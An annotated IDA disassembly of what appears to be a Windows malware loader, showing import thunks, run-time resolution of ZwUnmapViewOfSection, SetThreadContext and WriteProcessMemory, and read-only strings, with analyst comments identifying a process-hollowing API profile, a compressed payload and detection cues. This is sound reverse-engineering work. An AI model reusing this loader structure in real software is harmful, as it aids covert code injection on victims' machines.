jmp ds:GetOEMCP
; ---------------------------------------------------------------------------
jmp ds:GetCPInfo
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp ds:InterlockedExchange
; ---------------------------------------------------------------------------
jmp ds:VirtualQuery
; ---------------------------------------------------------------------------
jmp ds:HeapSize
; ---------------------------------------------------------------------------
jmp ds:QueryPerformanceCounter
; ---------------------------------------------------------------------------
jmp ds:GetTickCount
; ---------------------------------------------------------------------------
jmp ds:GetCurrentThreadId
; ---------------------------------------------------------------------------
jmp ds:GetCurrentProcessId
; ---------------------------------------------------------------------------
jmp ds:GetSystemTimeAsFileTime
; ---------------------------------------------------------------------------
jmp ds:LCMapStringA
; ---------------------------------------------------------------------------
jmp ds:MultiByteToWideChar
; ---------------------------------------------------------------------------
jmp ds:LCMapStringW
; ---------------------------------------------------------------------------
jmp ds:GetStringTypeA
; ---------------------------------------------------------------------------
jmp ds:GetStringTypeW
; ---------------------------------------------------------------------------
jmp ds:GetLocaleInfoA
; ---------------------------------------------------------------------------
jmp ds:VirtualProtect
; ---------------------------------------------------------------------------
jmp ds:GetSystemInfo
; ---------------------------------------------------------------------------
jmp ds:MessageBoxA
; ---------------------------------------------------------------------------
jmp ds:GetUserNameA
; =============== S U B R O U T I N E =======================================
;-----------------------------------------------------------------------
; sub_405F66 -- resolve ZwUnmapViewOfSection at run time:
;   dword_43E528 = GetProcAddress(GetModuleHandleA("ntdll.dll"),
;                                 "ZwUnmapViewOfSection")
; In:  none
; Out: eax = the resolved pointer (also stored in dword_43E528)
; Clobbers: eax, ecx, edx (Win32 API calls); stack balanced by the APIs
; The procedure name is pushed before the GetModuleHandleA call and stays
; on the stack as GetProcAddress's second argument; only hModule is pushed
; afterwards.
; NOTE(review): nothing is checked -- a NULL module handle goes straight
; into GetProcAddress and a NULL result is stored as-is, so a later call
; through dword_43E528 would fault if the lookup failed.
; Referenced only from .data:00408008, adjacent to the slots holding
; sub_405F83 and sub_405FA0 -- plausibly a function-pointer table run by an
; __initterm-style walker at start-up; confirm.
; Defensive note: the API is kept out of the static import table, but its
; name (aZwunmapviewofs, .rdata) remains in clear text for string scanning.
;-----------------------------------------------------------------------
sub_405F66 proc near ; DATA XREF: .data:00408008o
push offset aZwunmapviewofs ; "ZwUnmapViewOfSection"
push offset LibFileName ; "ntdll.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_43E528, eax
retn
sub_405F66 endp
; =============== S U B R O U T I N E =======================================
;-----------------------------------------------------------------------
; sub_405F83 -- resolve SetThreadContext at run time:
;   dword_43E52C = GetProcAddress(GetModuleHandleA("kernel32.dll"),
;                                 "SetThreadContext")
; In:  none
; Out: eax = the resolved pointer (also stored in dword_43E52C)
; Clobbers: eax, ecx, edx (Win32 API calls); stack balanced by the APIs
; Same push ordering as sub_405F66: the procedure name stays on the stack
; across GetModuleHandleA and becomes GetProcAddress's second argument.
; NOTE(review): neither the module handle nor the GetProcAddress result is
; checked before being used/stored.
; Referenced only from .data:0040800C (see the note on sub_405F66 about the
; adjacent slots). The name string (aSetthreadconte) is in clear text.
;-----------------------------------------------------------------------
sub_405F83 proc near ; DATA XREF: .data:0040800Co
push offset aSetthreadconte ; "SetThreadContext"
push offset ModuleName ; "kernel32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_43E52C, eax
retn
sub_405F83 endp
; =============== S U B R O U T I N E =======================================
;-----------------------------------------------------------------------
; sub_405FA0 -- resolve WriteProcessMemory at run time:
;   dword_43E524 = GetProcAddress(GetModuleHandleA("kernel32.dll"),
;                                 "WriteProcessMemory")
; In:  none
; Out: eax = the resolved pointer (also stored in dword_43E524)
; Clobbers: eax, ecx, edx (Win32 API calls); stack balanced by the APIs
; Same push ordering as sub_405F66: the procedure name stays on the stack
; across GetModuleHandleA and becomes GetProcAddress's second argument.
; NOTE(review): neither the module handle nor the GetProcAddress result is
; checked before being used/stored.
; Referenced only from .data:00408010 (see the note on sub_405F66 about the
; adjacent slots). aWriteprocessme is also referenced from sub_4015A2 (per
; the .rdata xref), so that routine appears to perform its own lookup of the
; same API -- confirm.
;-----------------------------------------------------------------------
sub_405FA0 proc near ; DATA XREF: .data:00408010o
push offset aWriteprocessme ; "WriteProcessMemory"
push offset ModuleName ; "kernel32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_43E524, eax
retn
sub_405FA0 endp
; ---------------------------------------------------------------------------
align 80h
_text ends
; Section 2. (virtual address 00006000)
; Virtual size : 000013FC ( 5116.)
; Section size in file : 00001400 ( 5120.)
; Offset to raw data for section: 00005400
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from ADVAPI32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall GetUserNameA(LPSTR lpBuffer,LPDWORD pcbBuffer)
extrn GetUserNameA:dword ; CODE XREF: sub_4017DA+24p
; DATA XREF: sub_4017DA+24r ...
;
; Imports from KERNEL32.dll
;
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_401000+21p
; ___crtMessageBoxA+18p
; DATA XREF: ...
; SIZE_T __stdcall VirtualQueryEx(HANDLE hProcess,LPCVOID lpAddress,PMEMORY_BASIC_INFORMATION lpBuffer,SIZE_T dwLength)
extrn VirtualQueryEx:dword ; CODE XREF: sub_4014E8+83p
; DATA XREF: sub_4014E8+66r ...
; BOOL __stdcall ReadProcessMemory(HANDLE hProcess,LPCVOID lpBaseAddress,LPVOID lpBuffer,SIZE_T nSize,SIZE_T *lpNumberOfBytesRead)
extrn ReadProcessMemory:dword ; CODE XREF: sub_4014E8+5Ep
; DATA XREF: sub_4014E8+5Er ...
; BOOL __stdcall GetThreadContext(HANDLE hThread,LPCONTEXT lpContext)
extrn GetThreadContext:dword ; CODE XREF: sub_4014E8+42p
; DATA XREF: sub_4014E8+42r ...
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName,LPSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,BOOL bInheritHandles,DWORD dwCreationFlags,LPVOID lpEnvironment,LPCSTR lpCurrentDirectory,LPSTARTUPINFOA lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: sub_4014E8+2Ap
; DATA XREF: sub_4014E8+2Ar ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: sub_4015A2+E0p
; WinMain(x,x,x,x)+A6p ...
; BOOL __stdcall VirtualProtectEx(HANDLE hProcess,LPVOID lpAddress,SIZE_T dwSize,DWORD flNewProtect,PDWORD lpflOldProtect)
extrn VirtualProtectEx:dword ; CODE XREF: sub_4015A2+3Ap
; DATA XREF: sub_4015A2+3Ar ...
; LPVOID __stdcall VirtualAllocEx(HANDLE hProcess,LPVOID lpAddress,SIZE_T dwSize,DWORD flAllocationType,DWORD flProtect)
extrn VirtualAllocEx:dword ; CODE XREF: sub_4015A2+72p
; sub_4015A2+9Ep
; DATA XREF: ...
; DWORD __stdcall ResumeThread(HANDLE hThread)
extrn ResumeThread:dword ; CODE XREF: sub_401707+Dp
; DATA XREF: sub_401707+Dr ...
; BOOL __stdcall ReadFile(HANDLE hFile,LPVOID lpBuffer,DWORD nNumberOfBytesToRead,LPDWORD lpNumberOfBytesRead,LPOVERLAPPED lpOverlapped)
extrn ReadFile:dword ; CODE XREF: sub_40171B+53p
; DATA XREF: sub_40171B+53r ...
; DWORD __stdcall GetFileSize(HANDLE hFile,LPDWORD lpFileSizeHigh)
extrn GetFileSize:dword ; CODE XREF: sub_40171B+29p
; DATA XREF: sub_40171B+29r ...
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName,DWORD dwDesiredAccess,DWORD dwShareMode,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD dwCreationDisposition,DWORD dwFlagsAndAttributes,HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: sub_40171B+1Cp
; DATA XREF: sub_40171B+1Cr ...
; int __stdcall lstrcmpA(LPCSTR lpString1,LPCSTR lpString2)
extrn lstrcmpA:dword ; CODE XREF: sub_4017DA+3Dp
; sub_4017DA+4Cp
; DATA XREF: ...
; BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName,DWORD dwFileAttributes)
extrn SetFileAttributesA:dword ; CODE XREF: WinMain(x,x,x,x)+57p
; DATA XREF: WinMain(x,x,x,x)+57r ...
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule,LPCH lpFilename,DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: WinMain(x,x,x,x)+1Bp
; __NMSG_WRITE+81p ...
; LPVOID __stdcall HeapAlloc(HANDLE hHeap,DWORD dwFlags,SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: __heap_alloc+3Ep
; ___sbh_heap_init+Dp ...
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
extrn GetStartupInfoA:dword ; CODE XREF: start+160p
; __ioinit+57p
; DATA XREF: ...
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: start:loc_401F8Bp
; DATA XREF: start:loc_401F8Br ...
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA:dword ; CODE XREF: start+20p
; DATA XREF: start+20r ...
; BOOL __stdcall HeapDestroy(HANDLE hHeap)
extrn HeapDestroy:dword ; CODE XREF: __heap_init+44p
; .text:0040213Ep
; DATA XREF: ...
; HANDLE __stdcall HeapCreate(DWORD flOptions,SIZE_T dwInitialSize,SIZE_T dwMaximumSize)
extrn HeapCreate:dword ; CODE XREF: __heap_init+11p
; DATA XREF: __heap_init+11r ...
; BOOL __stdcall VirtualFree(LPVOID lpAddress,SIZE_T dwSize,DWORD dwFreeType)
extrn VirtualFree:dword ; CODE XREF: .text:004020FEp
; .text:00402109p ...
; BOOL __stdcall HeapFree(HANDLE hHeap,DWORD dwFlags,LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: .text:00402116p
; .text:00402134p ...
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress,SIZE_T dwSize,DWORD flAllocationType,DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: ___sbh_alloc_new_region+7Ep
; ___sbh_alloc_new_group+52p ...
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap,DWORD dwFlags,LPVOID lpMem,SIZE_T dwBytes)
extrn HeapReAlloc:dword ; CODE XREF: ___sbh_alloc_new_region+27p
; _realloc+FDp ...
; BOOL __stdcall IsBadWritePtr(LPVOID lp,UINT_PTR ucb)
extrn IsBadWritePtr:dword ; CODE XREF: ___sbh_heap_check+1Bp
; ___sbh_heap_check+55p ...
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: unknown_libname_1+29p
; sub_40469C-7p
; DATA XREF: ...
; BOOL __stdcall TerminateProcess(HANDLE hProcess,UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: _doexit+1Ap
; DATA XREF: _doexit+1Ar ...
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: _doexit+13p
; DATA XREF: _doexit+13r ...
; BOOL __stdcall WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: __NMSG_WRITE+155p
; DATA XREF: __NMSG_WRITE+155r ...
; FARPROC __stdcall GetProcAddress(HMODULE hModule,LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_401000+3Ap
; sub_401000+45p ...
; LONG __stdcall UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo)
extrn UnhandledExceptionFilter:dword ; CODE XREF: __XcptFilter+167p
; DATA XREF: __XcptFilter+167r ...
; BOOL __stdcall FreeEnvironmentStringsA(LPCH)
extrn FreeEnvironmentStringsA:dword
; CODE XREF: ___crtGetEnvironmentStringsA+113p
; DATA XREF: ___crtGetEnvironmentStringsA+113r ...
; LPCH __stdcall GetEnvironmentStrings()
extrn GetEnvironmentStrings:dword
; CODE XREF: ___crtGetEnvironmentStringsA:loc_403A70p
; DATA XREF: ___crtGetEnvironmentStringsA:loc_403A70r ...
; BOOL __stdcall FreeEnvironmentStringsW(LPWCH)
extrn FreeEnvironmentStringsW:dword
; CODE XREF: ___crtGetEnvironmentStringsA+C1p
; DATA XREF: ___crtGetEnvironmentStringsA+C1r ...
; int __stdcall WideCharToMultiByte(UINT CodePage,DWORD dwFlags,LPCWSTR lpWideCharStr,int cchWideChar,LPSTR lpMultiByteStr,int cbMultiByte,LPCSTR lpDefaultChar,LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword
; CODE XREF: ___crtGetEnvironmentStringsA+86p
; ___crtGetEnvironmentStringsA+A8p ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword
; CODE XREF: ___crtGetEnvironmentStringsA:loc_4039C9p
; ___crtLCMapStringA:loc_40530Cp ...
; LPWCH __stdcall GetEnvironmentStringsW()
extrn GetEnvironmentStringsW:dword
; CODE XREF: ___crtGetEnvironmentStringsA+1Cp
; ___crtGetEnvironmentStringsA+52p
; DATA XREF: ...
; UINT __stdcall SetHandleCount(UINT uNumber)
extrn SetHandleCount:dword ; CODE XREF: __ioinit+19Cp
; DATA XREF: __ioinit+19Cr ...
; DWORD __stdcall GetFileType(HANDLE hFile)
extrn GetFileType:dword ; CODE XREF: __ioinit+FEp
; __ioinit+165p
; DATA XREF: ...
; UINT __stdcall GetACP()
extrn GetACP:dword ; CODE XREF: __setmbcp+42p
; DATA XREF: .text:004047E5r ...
; UINT __stdcall GetOEMCP()
extrn GetOEMCP:dword ; CODE XREF: __setmbcp+2Bp
; DATA XREF: .text:004047D0r ...
; BOOL __stdcall GetCPInfo(UINT CodePage,LPCPINFO lpCPInfo)
extrn GetCPInfo:dword ; CODE XREF: _setSBUpLow+1Cp
; __setmbcp+93p ...
extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwindr
; LONG __stdcall InterlockedExchange(volatile LONG *Target,LONG Value)
extrn InterlockedExchange:dword ; CODE XREF: __ValidateEH3RN+131p
; __ValidateEH3RN+196p ...
; SIZE_T __stdcall VirtualQuery(LPCVOID lpAddress,PMEMORY_BASIC_INFORMATION lpBuffer,SIZE_T dwLength)
extrn VirtualQuery:dword ; CODE XREF: __ValidateEH3RN+B3p
; __resetstkoflw+1Ap ...
; SIZE_T __stdcall HeapSize(HANDLE hHeap,DWORD dwFlags,LPCVOID lpMem)
extrn HeapSize:dword ; CODE XREF: __msize+30p
; DATA XREF: __msize+30r ...
; BOOL __stdcall QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount)
extrn QueryPerformanceCounter:dword ; CODE XREF: ___security_init_cookie+43p
; DATA XREF: ___security_init_cookie+43r ...
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: ___security_init_cookie+37p
; DATA XREF: ___security_init_cookie+37r ...
; DWORD __stdcall GetCurrentThreadId()
extrn GetCurrentThreadId:dword ; CODE XREF: ___security_init_cookie+2Fp
; DATA XREF: ___security_init_cookie+2Fr ...
; DWORD __stdcall GetCurrentProcessId()
extrn GetCurrentProcessId:dword ; CODE XREF: ___security_init_cookie+27p
; DATA XREF: ___security_init_cookie+27r ...
; void __stdcall GetSystemTimeAsFileTime(LPFILETIME lpSystemTimeAsFileTime)
; --- Import thunks, continued ---------------------------------------------
; Each `extrn NAME:dword` is an IAT slot: code reaches the API through an
; indirect call on the slot, which is why the same instruction appears as
; both a CODE XREF (p) and a DATA XREF (r). Of the slots in this stretch,
; only FreeLibrary is referenced from the sample's own code (sub_401000,
; which also uses the IDA-named LibFileName/ProcName strings in .rdata, i.e.
; a LoadLibraryA / GetProcAddress / FreeLibrary sequence); all the others
; are reached only from CRT routines (___security_init_cookie, ___crt*,
; __resetstkoflw, __NMSG_WRITE, __ioinit).
extrn GetSystemTimeAsFileTime:dword ; CODE XREF: ___security_init_cookie+1Bp
; DATA XREF: ___security_init_cookie+1Br ...
; int __stdcall LCMapStringA(LCID Locale,DWORD dwMapFlags,LPCSTR lpSrcStr,int cchSrc,LPSTR lpDestStr,int cchDest)
extrn LCMapStringA:dword ; CODE XREF: ___crtLCMapStringA+2C3p
; ___crtLCMapStringA+344p ...
; int __stdcall MultiByteToWideChar(UINT CodePage,DWORD dwFlags,LPCSTR lpMultiByteStr,int cbMultiByte,LPWSTR lpWideCharStr,int cchWideChar)
extrn MultiByteToWideChar:dword ; CODE XREF: ___crtLCMapStringA+C0p
; ___crtLCMapStringA+141p ...
; int __stdcall LCMapStringW(LCID Locale,DWORD dwMapFlags,LPCWSTR lpSrcStr,int cchSrc,LPWSTR lpDestStr,int cchDest)
extrn LCMapStringW:dword ; CODE XREF: ___crtLCMapStringA+27p
; ___crtLCMapStringA+15Bp ...
; BOOL __stdcall GetStringTypeA(LCID Locale,DWORD dwInfoType,LPCSTR lpSrcStr,int cchSrc,LPWORD lpCharType)
extrn GetStringTypeA:dword ; CODE XREF: ___crtGetStringTypeA+19Cp
; DATA XREF: ___crtGetStringTypeA+19Cr ...
; BOOL __stdcall GetStringTypeW(DWORD dwInfoType,LPCWSTR lpSrcStr,int cchSrc,LPWORD lpCharType)
extrn GetStringTypeW:dword ; CODE XREF: ___crtGetStringTypeA+24p
; ___crtGetStringTypeA+128p
; DATA XREF: ...
; int __stdcall GetLocaleInfoA(LCID Locale,LCTYPE LCType,LPSTR lpLCData,int cchData)
extrn GetLocaleInfoA:dword ; CODE XREF: ___ansicp+20p
; DATA XREF: ___ansicp+20r ...
; BOOL __stdcall VirtualProtect(LPVOID lpAddress,SIZE_T dwSize,DWORD flNewProtect,PDWORD lpflOldProtect)
; VirtualProtect is only used by the CRT's __resetstkoflw here (guard-page
; restore); it is not part of the sample's own memory manipulation.
extrn VirtualProtect:dword ; CODE XREF: __resetstkoflw+D5p
; DATA XREF: __resetstkoflw+D5r ...
; void __stdcall GetSystemInfo(LPSYSTEM_INFO lpSystemInfo)
extrn GetSystemInfo:dword ; CODE XREF: __resetstkoflw+2Bp
; DATA XREF: __resetstkoflw+2Br ...
; HANDLE __stdcall GetStdHandle(DWORD nStdHandle)
extrn GetStdHandle:dword ; CODE XREF: __NMSG_WRITE+14Ep
; __ioinit+157p
; DATA XREF: ...
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
; The one slot here called from sample code (sub_401000).
extrn FreeLibrary:dword ; CODE XREF: sub_401000+77p
; DATA XREF: sub_401000+77r ...
;
; Imports from USER32.dll
;
; int __stdcall MessageBoxA(HWND hWnd,LPCSTR lpText,LPCSTR lpCaption,UINT uType)
; Called directly from WinMain with the Text/Caption strings in .rdata.
extrn MessageBoxA:dword ; CODE XREF: WinMain(x,x,x,x)+43p
; DATA XREF: WinMain(x,x,x,x)+43r ...
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 40610Ch
; Read-only strings used by the sample's own code. The API names below are
; NOT static imports: IDA's argument-derived names (LibFileName, ProcName,
; ModuleName) and the xrefs show them being passed to LoadLibraryA /
; GetModuleHandleA / GetProcAddress, i.e. resolved at run time:
;   RtlGetCompressionWorkSpaceSize, RtlDecompressBuffer  <- ntdll.dll (sub_401000)
;   WriteProcessMemory                                   (sub_4015A2, sub_405FA0)
;   ZwUnmapViewOfSection                                 (sub_405F66)
;   SetThreadContext                                     (sub_405F83)
;   VirtualAlloc                                         (WinMain)
; Except for VirtualAlloc, none of these names appear in the import name
; table at the end of this segment, whereas CreateProcessA,
; GetThreadContext, ReadProcessMemory, VirtualAllocEx, VirtualProtectEx and
; ResumeThread do. The combined set is the API profile commonly associated
; with process hollowing (an inference from names and xrefs only; confirm by
; reading sub_4015A2 and sub_40171B). For detection, the run-time-resolved
; names are the ones an import-table triage would not show; the
; RtlDecompressBuffer pair suggests the payload is stored compressed.
align 10h
; char aRtlgetcompress[]
aRtlgetcompress db 'RtlGetCompressionWorkSpaceSize',0 ; DATA XREF: sub_401000+3Co
align 10h
; char ProcName[]
ProcName db 'RtlDecompressBuffer',0 ; DATA XREF: sub_401000+34o
; char LibFileName[]
LibFileName db 'ntdll.dll',0 ; DATA XREF: sub_401000+1Co
; sub_405F66+5o
align 10h
; char ModuleName[]
ModuleName db 'kernel32.dll',0 ; DATA XREF: sub_4015A2+DBo
; WinMain(x,x,x,x)+9Fo ...
align 10h
; char aWriteprocessme[]
aWriteprocessme db 'WriteProcessMemory',0 ; DATA XREF: sub_4015A2+D6o
; sub_405FA0o
align 4
; Both strings are referenced only by sub_4017DA; with GetUserNameA
; (ADVAPI32) and lstrcmpA among the static imports this is plausibly a
; user-name / environment check — TODO confirm in sub_4017DA.
; char aCurrentuser[]
aCurrentuser db 'CurrentUser',0 ; DATA XREF: sub_4017DA+47o
; char String1[]
String1 db 'USER',0 ; DATA XREF: sub_4017DA+38o
align 4
; char aVirtualalloc[]
aVirtualalloc db 'VirtualAlloc',0 ; DATA XREF: WinMain(x,x,x,x)+9Ao
align 4
; MessageBoxA text "." and a caption of punctuation only (WinMain+3D/+38);
; presumably a decoy dialog — the exact purpose is not visible here.
; char Text[]
Text: ; DATA XREF: WinMain(x,x,x,x)+3Do
unicode 0, <.>,0
; char Caption[]
Caption db '.%%%^###########%^#^',0 ; DATA XREF: WinMain(x,x,x,x)+38o
align 4
; char aZwunmapviewofs[]
aZwunmapviewofs db 'ZwUnmapViewOfSection',0 ; DATA XREF: sub_405F66o
align 4
; char aSetthreadconte[]
aSetthreadconte db 'SetThreadContext',0 ; DATA XREF: sub_405F83o
align 10h
; SEH3 scope table (try level -1, filter, handler) registered by start()'s
; prologue — IDA's _msEH struct.
; const CHAR stru_4061E0
stru_4061E0 _msEH <0FFFFFFFFh, offset loc_402021, offset loc_402035>
; DATA XREF: start+2o
; char aCorexitprocess[]
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: unknown_libname_1+Fo
align 4
; char aMscoree_dll[]
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: unknown_libname_1o
; MSVC CRT runtime-error message strings (R60xx) used by __NMSG_WRITE via the
; {number, pointer} table at off_408064 in .data, followed by the /GS
; failure texts of ___security_error_handler, the ___crtMessageBoxA helper
; names and the SEH3 scope tables (stru_*) of the CRT functions that
; reference them. All of this is library data, not sample-specific.
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_408064o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+123o
; ___security_error_handler+132o
align 4
; char asc_4065D8[]
asc_4065D8 db 0Ah ; DATA XREF: __NMSG_WRITE+107o
; ___security_error_handler+FCo
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+F5o
db 0Ah
db 'Program: ',0
align 4
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+C1o
; ___security_error_handler+CCo
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+8Eo
; ___security_error_handler+8Bo
byte_406613 db 0 ; DATA XREF: __wincmdln+1Bo
align 8
; SEH3 scope tables (try level -1, filter, handler) for sub_403C89 and
; sub_403CCD, referenced from each function's prologue (+2).
stru_406618 _msEH <0FFFFFFFFh, offset loc_403CB6, offset loc_403CBA>
; DATA XREF: sub_403C89+2o
align 8
stru_406628 _msEH <0FFFFFFFFh, offset loc_403CFA, offset loc_403CFE>
; DATA XREF: sub_403CCD+2o
; Names ___crtMessageBoxA resolves from user32.dll at run time (CRT code).
; char aGetprocesswind[]
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: ___crtMessageBoxA+73o
; char aGetuserobjecti[]
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: ___crtMessageBoxA+62o
align 4
; char aGetlastactivep[]
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+47o
align 4
; char aGetactivewindo[]
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+3Fo
; char aMessageboxa[]
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2Eo
; char aUser32_dll[]
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+13o
align 8
stru_4066A8 _msEH <0FFFFFFFFh, offset sub_404688, offset sub_40468C>
; DATA XREF: sub_40469C-2Fo
; char aProgram[]
aProgram db 'Program: ',0 ; DATA XREF: ___security_error_handler+108o
align 10h
; /GS (stack cookie) failure messages; the cookie itself is dword_408190.
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: ___security_error_handler+62o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0
; DATA XREF: ___security_error_handler:loc_4051A4o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: ___security_error_handler+4Co
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
; char aUnknownSecurit[]
aUnknownSecurit db 'Unknown security failure detected!',0
; DATA XREF: ___security_error_handler+47o
align 4
stru_406858 _msEH <0FFFFFFFFh, offset loc_40517F, offset loc_405183>
; DATA XREF: ___security_error_handler+5o
; Remaining CRT-owned .rdata tables:
; - asc_406968 / word_406B6A / aHH: character-class and case-map tables that
;   _x_ismbbtype and __setmbcp read through off_4082A0 / off_4082A4 in
;   .data. IDA rendered the control-character runs as `unicode` strings;
;   they are presumably byte tables, not text.
; - SrcStr: the single WCHAR ___crtLCMapStringA / ___crtGetStringTypeA pass
;   when probing the W variant of the API.
; - stru_406D70 / stru_406D98 / stru_406DA8: SEH3 scope tables; the raw dd
;   run after stru_406D70 holds two more (-1, filter, handler) entries in
;   the same shape that IDA did not fold into the struct.
dd 41h dup(0)
asc_406968: ; DATA XREF: .data:off_4082A0o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
db 2 dup(0)
word_406B6A dw 20h ; DATA XREF: .data:off_4082A4o
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 10h dup(200020h), 480020h, 8 dup(100010h), 140010h
dd 100014h, 2 dup(100010h), 100014h, 2 dup(100010h), 1010010h
dd 0Bh dup(1010101h), 1010010h, 3 dup(1010101h), 0Ch dup(1020102h)
dd 1020010h, 3 dup(1020102h), 1010102h
; const WCHAR SrcStr
SrcStr dw 0 ; DATA XREF: ___crtLCMapStringA+1Co
; ___crtGetStringTypeA+1Eo
align 10h
stru_406D70 _msEH <0FFFFFFFFh, offset loc_4055CC, offset loc_4055D0>
